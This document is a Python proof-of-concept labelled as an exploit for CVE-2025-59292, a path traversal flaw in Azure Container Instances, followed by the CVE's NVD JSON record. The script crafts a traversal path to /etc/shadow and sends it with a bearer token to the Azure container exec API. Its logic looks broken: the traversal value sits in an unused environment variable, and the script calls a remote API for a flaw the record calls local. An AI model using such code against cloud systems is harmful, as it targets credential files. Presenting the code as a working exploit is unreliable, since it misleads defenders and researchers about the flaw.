CVE-2025-59292

# CVE-2025-59292 - Azure Container Instances Path Traversal PoC # This PoC demonstrates the external control of file name or path vulnerability # in Confidential Azure Container Instances for privilege escalation. import requests import json # Azure Container Instances API endpoint ACI_API = "https://management.azure.com/subscriptions/{subscription_id}" RESOURCE_GROUP = "target-resource-group" CONTAINER_GROUP = "target-container-group" API_VERSION = "2023-05-01" def exploit_path_traversal(container_name, malicious_path): """ Exploit path traversal in Azure Container Instances to access files outside the intended container boundary. """ # Construct the malicious path with traversal sequences traversal_path = f"/var/log/containers/{malicious_path}/../../../../etc/shadow" # Execute command within the container with manipulated path endpoint = ( f"{ACI_API}/resourceGroups/{RESOURCE_GROUP}/providers/" f"Microsoft.ContainerInstance/containerGroups/{CONTAINER_GROUP}" f"/containers/{container_name}/exec?api-version={API_VERSION}" ) payload = { "command": "/bin/sh", "environmentVariables": [ {"name": "MALICIOUS_PATH", "value": traversal_path} ] } headers = { "Authorization": "Bearer <access_token>", "Content-Type": "application/json" } response = requests.post(endpoint, headers=headers, data=json.dumps(payload)) if response.status_code == 200: print(f"[+] Path traversal successful: {traversal_path}") return response.json() else: print(f"[-] Exploit failed: {response.status_code}") return None # Example usage - requires high privileges on the container instance # exploit_path_traversal("target-container", "legitimate_dir") print("CVE-2025-59292 PoC - Azure Container Instances Path Traversal") print("Note: Requires high-level authorized access (PR:H) to exploit")

{"cve": {"id": "CVE-2025-59292", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:16:12.517", "lastModified": "2025-10-17T15:31:48.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "External control of file name or path in Confidential Azure Container Instances allows an authorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.5, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:azure_compute_gallery:-:*:*:*:*:*:*:*", "matchCriteriaId": "C376C1DE-E5D6-45E1-8E7A-32F35136EADE"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59292", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}